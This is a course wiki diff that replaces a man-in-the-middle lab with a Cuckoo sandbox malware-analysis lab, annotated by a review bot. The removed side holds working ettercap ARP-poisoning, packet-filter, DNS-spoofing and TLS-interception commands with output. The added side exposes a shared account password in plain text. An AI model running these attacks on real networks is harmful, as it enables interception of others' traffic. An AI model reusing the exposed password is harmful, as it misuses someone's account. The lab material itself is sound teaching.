This shows you the differences between two versions of the page.
cdci:labs:4 [2020/05/15 17:07] mihai.chiroiu |
cdci:labs:4 [2025/01/21 19:24] (current) mihai.chiroiu |
||
---|---|---|---|
Line 1: | Line 1: | ||
- | ~~SHOWSOLUTION~~ | + | ====== Lab04. Cuckoo sandboxing ====== |
- | ====== Lab04. Man-in-the-middle attack ====== | + | ===== Objectives ===== |
- | <note warning> | + | * Investigate a possible malware using automatic tools |
- | Important read to be graded! | + | * Use the cuckoo sandbox automated malware analysis system |
- | {{page>:cdci:rec&nofooter&noeditbutton&noheader}} | + | * Introduction to basic Linux command line |
- | </note> | + | |
- | ===== Objectives ===== | ||
- | * MITM using ettercap tool | ||
- | * Wireshark usage for protocol dissection - DNS | ||
- | * Understanding attacks on ARP | ||
- | * Learning different types of MITM | ||
===== Topology ===== | ===== Topology ===== | ||
- | {{ :cdci:labs:cdci_lab04-mitm-topology.png?direct&600 |}} | + | For this exercise you will need the [[https://drive.google.com/open?id=11WTT3NYUfVk7UopVnUc-uf9SKgvzIcOf |malware archive]]. |
+ | You will also need a Linux environment with Cuckoo sandbox installed and a running Windows VM. One can be downloaded from [[ https://drive.google.com/file/d/14-7DqZ1jNKuqxr73Wk8TcTylRl7tNKNk/view?usp=sharing | here]]. | ||
===== Tasks ===== | ===== Tasks ===== | ||
- | ==== 01. [5p] Virtual machine setup ==== | + | ==== 01. [10p] Virtual machine setup ==== |
- | First, make sure that your virtual machine is updated (run the provided update.sh script, or create one). | + | You will need to have Linux VM (we have tested with Ubuntu 20.04) and then install the [[https://cuckoo.readthedocs.io/en/latest/installation/host/installation/ | Cuckoo sandbox on top of it]]. You can access Cuckoo sandbox from a browser, and to limit the impact of the malware analysis process please do so from the same VM (i.e. install a graphical server and a browser on the Linux VM). |
- | Next, in one terminal start the provided Mininet topology. | ||
<code> | <code> | ||
- | root@cdci:/# cd cdci/lab04 | + | $startx (to start the graphical interface) |
- | root@cdci:/# /usr/bin/python3 topology.py | + | |
</code> | </code> | ||
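Review bot: the new `<code>` block under "01. [10p] Virtual machine setup" carries an explanatory remark on the command line itself, `$startx (to start the graphical interface)`, so a student who copies the block types the parenthetical as arguments to `startx`; keep the bare command in the block and move the explanation into the sentence above it (also drop the `$` prompt or separate it with a space, consistently with the later `$cuckoo` lines). In the same section, "You will need to have Linux VM" needs an article ("a Linux VM"). Separately, the old side's `<note warning>` with the `{{page>:cdci:rec&nofooter&noeditbutton&noheader}}` grading-rules include was removed together with `~~SHOWSOLUTION~~`; if the rules still apply to this lab, restore that include under the new title.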
- | If there are any problems with starting the topology (if all is good you should see the Mininet prompt ">") use the given cleanup script and try to restart the topology. | + | After the installation you need to power on the cuckoo sandbox system using the following commands. To verify that cuckoo sandboxing is running open the [[http://127.0.0.1:8000 | hxxp://127.0.0.1:8000]] into a browser. |
- | + | ||
- | ==== 02. [5p] Internet connectivity ==== | + | |
- | + | ||
- | Before you begin, make sure that you have Internet connectivity on all two nodes (attacker and victim). R1 should be the gateway for the Attacker and Victim. Write down the MAC and IP addresses of all 3 nodes (including the gateway). Use the provided scripts to access the nodes. | + | |
<code> | <code> | ||
- | root@ip-172-30-0-165:/# ./attacker_bash.sh | + | $cuckoo web runserver |
- | root@attacker:/# | + | $cuckoo -d (!!! do not run as sudo) |
- | + | ||
- | root@ip-172-30-0-165:/# ./victim_bash.sh | + | |
- | root@victim:/# | + | |
</code> | </code> | ||
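Review bot: `$cuckoo web runserver` and `$cuckoo -d (!!! do not run as sudo)` are both foreground processes, so the sentence "power on the cuckoo sandbox system using the following commands" should say to run each in its own terminal; the later paragraph ("the terminal where the cuckoo daemon was lunched") already assumes that layout. The "do not run as sudo" warning applies to both commands, not only the daemon: Cuckoo keeps its working directory (`.cuckoo` in the invoking user's home) per user, so starting either command once as root leaves root-owned files or a second working directory that the unprivileged run will not see, and running the daemon unprivileged is also the containment boundary that the section's "limit the impact of the malware analysis process" sentence relies on. As with the `startx` line, the parenthetical belongs outside the code block. Minor: the link text `hxxp://127.0.0.1:8000` defangs a loopback URL whose target is written `http://`; use the plain URL here or defang consistently (the later virustotal link has the same mismatch).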
- | ==== 03. [30p] ARP poisoning MITM attack ==== | + | Next, inside your Linux VM one needs to run a second VM with Windows. This one is used by the Cuckoo framework to do the automatic malware analysis. Follow the tutorials available and make sure that the Windows VM is available. In the case of misconfigured guest VM (i.e., the Windows 7 VirtualBox VM), you can reset it to the initial configuration. [[https://cuckoo.readthedocs.io/en/latest/installation/guest/saving/|1]] |
+ | - Delete any existing snapshots. | ||
+ | - Power on the virtual machine. | ||
+ | - Create a new snapshot <code> VBoxManage snapshot "win7cuckoo" take "original" --pause </code> | ||
+ | - Power of the virtual machine <code> VBoxManage controlvm "win7cuckoo" poweroff </code> | ||
+ | - Restore the virtual machine to use the previously created snapshot. <code> VBoxManage snapshot "win7cuckoo" restorecurrent </code> | ||
- | The goal of this exercise is to pass all the victim's traffic through the attacker's machine. From the Attacker node start an ARP poisoning mitm attack against the Victim machine using ettercap tool. Use “ping” tool from Victim and make sure that all traffic (including to outside) goes through the Attacker’s node (use extra verbose option for ettercap). | + | All this setup is already done in the following VM [[https://drive.google.com/file/d/14-7DqZ1jNKuqxr73Wk8TcTylRl7tNKNk/view?usp=sharing]] |
- | <note tip> | + | ==== 02. [30p] Malware analysis ==== |
- | Make sure that you enable remote sniffing. To exit ettercap simply press Q. | + | |
- | </note> | + | |
- | Use tcpdump to save all the traffic from the victim and analyze it using Wireshark. Try to answer the following questions: | + | To start the malware investigation, submit the received files using the dashboard and select Analyze from the “Configure your Analysis” page. Please configure a 500 seconds Timeout to allow enough time for execution and make sure that the package type is “exe” from the left-side panel for a proper lunch. |
- | * Can you spot the Gratuitous ARP packet sent when infecting the victim? | + | |
- | * Look into the layer 2 of the packets and see how the destination MAC address has changed under the attack. | + | |
- | * Can you spot the Gratuitous ARP packet when the infection is stopped? | + | |
- | <solution> | + | * Once the process has started, you should be able to see the progress in the terminal where the cuckoo daemon was lunched. Moreover, the Windows 7 pre-configured virtual machine should be started, and the malware launched. |
- | <code> | + | {{ :cdci:labs:cdci_lab02_cuckoo-sandbox-vm.jpg?direct&600 |}} |
- | root@attacker:/# ettercap -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// | + | * Observe that the python agent within the Windows 7 has launched the malware and is monitoring it. You should also be able to see the random mouse movements. Why is this happening? |
- | ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team | + | ==== 03. [20p] Report overview ==== |
- | Listening on: | + | After the report has been generated, you should be able to answer the following questions. |
- | attacker-eth0 -> FE:14:85:E7:5F:D0 | + | |
- | 192.168.16.2/255.255.255.0 | + | |
- | * |==================================================>| 100.00 % | + | |
- | [...] | + | |
- | Sat Mar 14 20:39:26 2020 [835705] | + | - What is the executable file format? What is the Original Filename of the executable? |
- | D2:5D:2C:AD:D4:F5 --> FE:14:85:E7:5F:D0 | + | - What is the hash (preferable SHA2 family) of the malware? Can you find it on [[http://www.virustotal.com | hxxp://www.virustotal.com]]? |
- | 192.168.16.100:0 --> 8.8.8.8:0 | P (0) | + | - What command is executed to allow access to all files? |
- | + | - Which DNS records are recorded during the analysis? | |
- | + | - What registry entries does the malware add? | |
- | root@attacker:/# tcpdump -n -i Attacker-eth0 -w mitm.pcap | + | |
- | </code> | + | |
- | </solution> | + | |
- | ==== 04. [10p] Traffic dissection ==== | + | ==== 04. [30p] More result analysis ==== |
- | Investigate the following traffic as it is generated by the Victim node: | + | All the monitored actions are stored by Cuckoo in the “.cuckoo” configuration folder under the storage directory. |
- | * HTTP and DNS while under MITM attack. Can you use Wireshark and rebuild/export the HTML pages that the victim opened (use wget or curl)?. | + | * Find in what languages is the support message from the malware available. |
+ | * Which files were encrypted during the process? | ||
+ | * Have a look at the captured traffic using Wireshark. | ||
- | <note tip> | + | ==== 05. [10p] Custom rules for automated analysis ==== |
- | Transfer the pcap file to your local computer and open it in wireshark. Then select File->Export HTML Objects. | + | |
- | </note> | + | |
- | ==== 05. [20p] Raw packets altering ==== | + | Cuckoo sandbox has a lot of extra tools that it can use for deeper analysis, including snort IDS, IDA for binary or Yara for signature matching. The Yara rules can be run against the binary itself, against the memory dump or accessed URLs. In this exercise we are going to use the Yara rules available on the following github [[https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_MS17-010_Wannacrypt.yar | repository]]. Just copy them in the yara configuration directory and re-run the analysis. |
- | Ettercap filters can also be used to modify packets as they pass through the attacker’s node. Use the provided filter to change icmp type from echo to reply (Hint: [[https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml]]). | + | ==== 06. [Bonus 10p] Custom rules for automated analysis ==== |
- | * You should observe the changes on the victim (no more replies). | + | |
- | * Use tcpdump on the attacker to inspect the changes. | + | |
- | <note tip> | + | Redo the analysis using the https://any.run/ platform. |
- | [[https://linux.die.net/man/8/etterfilter]] | + | |
- | </note> | + | |
- | + | ||
- | <code> | + | |
- | cat icmp.filter | + | |
- | if (ip.proto == ICMP) { | + | |
- | msg("Changing ICMP type!\n"); | + | |
- | replace("8.8.8.8", "8.8.4.4"); | + | |
- | } | + | |
- | etterfilter icmp.filter -o icmp.ef | + | |
- | </code> | + | |
<solution> | <solution> | ||
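Review bot: the heading `==== 06. [Bonus 10p] Custom rules for automated analysis ====` repeats the title of task 05 while its body is "Redo the analysis using the https://any.run/ platform"; rename it to describe the any.run exercise. Typos in the same region: "Power of the virtual machine" should be "Power off" (the command that follows is `controlvm ... poweroff`), and "for a proper lunch" / "the cuckoo daemon was lunched" should read "launch" / "launched". In task 04 the sentence "stored by Cuckoo in the “.cuckoo” configuration folder under the storage directory" inverts the layout: `.cuckoo` is the working directory and the per-task results sit in its `storage/analyses/<task id>` subtree, which is where the "support message" languages, the list of encrypted files and the capture for Wireshark are to be found. In task 05, "copy them in the yara configuration directory" should name the target: the working directory's `yara/` tree has one subdirectory per scan target matching the three targets the section lists (the binary, the memory dump, accessed URLs), and rules placed in the wrong one never fire, which would make the "re-run the analysis" step look like a failed rule rather than a misplaced file.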
- | <code> | + | For any.run use the student.cdci@totococo.fr.nf / "2YGt@pS5TtqUEkS" account |
- | cat icmp.filter | + | |
- | if (ip.proto == ICMP && icmp.type == 0) { | + | |
- | msg("Changing address!\n"); | + | |
- | icmp.type = 8; | + | |
- | } | + | |
- | etterfilter icmp.filter -o icmp.ef | + | |
- | ettercap -T -F icmp.ef -M ARP:remote /192.168.16.100// /192.168.16.1// | + | |
- | </code> | + | |
- | </solution> | + | |
- | + | ||
- | + | ||
- | + | ||
- | ==== 06. [10p] DNS traffic altering ==== | + | |
- | + | ||
- | Another interesting plugin of Ettercap is DNS spoofing. Config it such that any queries for the “facebook.com” domain name are translated into “127.0.0.1”. | + | |
- | + | ||
- | <note tip> | + | |
- | [[https://linux.die.net/man/8/ettercap_plugins]] | + | |
- | </note> | + | |
- | + | ||
- | <solution> | + | |
- | <code> | + | |
- | root@attacker:~# cat /etc/ettercap/etter.dns | + | |
- | www.facebook.com A 127.0.0.1 | + | |
- | root@attacker:/# ettercap -P dns_spoof -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// | + | |
- | + | ||
- | Listening on: | + | |
- | attacker-eth0 -> 1E:D4:8A:37:43:CD | + | |
- | 192.168.16.2/255.255.255.0 | + | |
- | * |==================================================>| 100.00 % | + | |
- | Activating dns_spoof plugin... | + | |
- | + | ||
- | Sat Mar 14 21:22:44 2020 [161164] | + | |
- | CE:82:B8:0E:6B:72 --> 1E:D4:8A:37:43:CD | + | |
- | UDP 192.168.16.100:48445 --> 172.30.0.2:53 | (34) | + | |
- | A............www.facebook.com.....dns_spoof: A [www.facebook.com] spoofed to [127.0.0.1] TTL [3600 s] | + | |
- | + | ||
- | + | ||
- | root@victim:/# nslookup www.facebook.com | + | |
- | Non-authoritative answer: | + | |
- | www.facebook.com canonical name = star-mini.c10r.facebook.com. | + | |
- | Name: star-mini.c10r.facebook.com | + | |
- | Address: 157.240.221.35 | + | |
- | [...] | + | |
- | root@victim:/# nslookup www.facebook.com | + | |
- | Name: www.facebook.com | + | |
- | Address: 127.0.0.1 | + | |
- | </code> | + | |
- | </solution> | + | |
- | ==== 07. [20p] HTTPS traffic inspection ==== | + | |
- | + | ||
- | Unfortunately, HTTPS traffic cannot be inspected, or can it :). We will try to use ettercap and observe changes in the certificate chain when MITM attack is active. | + | |
- | * First, use the “openssl s_client” tool (or other) to see the certificates path for the “www.google.com” website. <code> root@victim:~# openssl s_client -showcerts www.google.com:443 | + | |
- | CONNECTED(00000005) | + | |
- | depth=2 OU = GlobalSign Root CA - R2, O = GlobalSign, CN = GlobalSign | + | |
- | verify return:1 | + | |
- | depth=1 C = US, O = Google Trust Services, CN = GTS CA 1O1 | + | |
- | verify return:1 | + | |
- | depth=0 C = US, ST = California, L = Mountain View, O = Google LLC, CN = www.google.com | + | |
- | verify return:1 | + | |
- | </code> | + | |
- | * Next, run ettercap without TLS MITM (-S). | + | |
- | * Now, run ettercap including TLS MITM. | + | |
- | + | ||
- | <note tip> | + | |
- | For the TLS MITM you will require a certificate and a private key to be used when running ettercap (hint: [[https://manpages.debian.org/jessie/ettercap-common/ettercap.8.en.html|--certificate]]). Use the following code to create the private key and certificate. | + | |
- | <code> | + | |
- | root@attacker:~# openssl genrsa -out hacker.pem 2048 | + | |
- | root@attacker:~# openssl req -x509 -new -key hacker.pem -sha256 -days 365 -out hacker.crt | + | |
- | </code> | + | |
- | </note> | + | |
- | + | ||
- | <note tip> | + | |
- | For the MITM TLS attack we have to allow ettercap to run as root user and enable iptables configurations. This is required to allow ettercap SSL filter to receive and decode the TLS traffic. Modify the configuration file, “/etc/ettercap/etter.conf”, with the following. | + | |
- | <code> | + | |
- | ec_uid = 0 | + | |
- | ec_gid = 0 | + | |
- | # if you use iptables: | + | |
- | redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | + | |
- | redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | + | |
- | redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport" | + | |
- | redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport" | + | |
- | </code> | + | |
- | </note> | + | |
- | + | ||
- | <solution> | + | |
- | <code> | + | |
- | root@attacker:~# ettercap -E -T -M ARP:remote --private-key hacker.pem --certificate hacker.crt /192.168.16.100// /192.168.16.1// | + | |
- | + | ||
- | + | ||
- | root@victim:~# openssl s_client -showcerts www.google.com:443 | + | |
- | CONNECTED(00000005) | + | |
- | depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd | + | |
- | verify error:num=18:self signed certificate | + | |
- | verify return:1 | + | |
- | depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd | + | |
- | verify return:1 | + | |
- | --- | + | |
- | </code> | + | |
</solution> | </solution> |
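Review bot: the added line `For any.run use the student.cdci@totococo.fr.nf / ... account` publishes a shared account password in the page source; `<solution>` only hides it in the rendered view, and the value stays readable in this revision diff and in the page history even after it is edited out, so treat it as exposed, rotate it, and hand the account to students through the course channel rather than the wiki. The empty `<solution>` ... `</solution>` pair that results on the new side can then be dropped, since the any.run task has no other solution text.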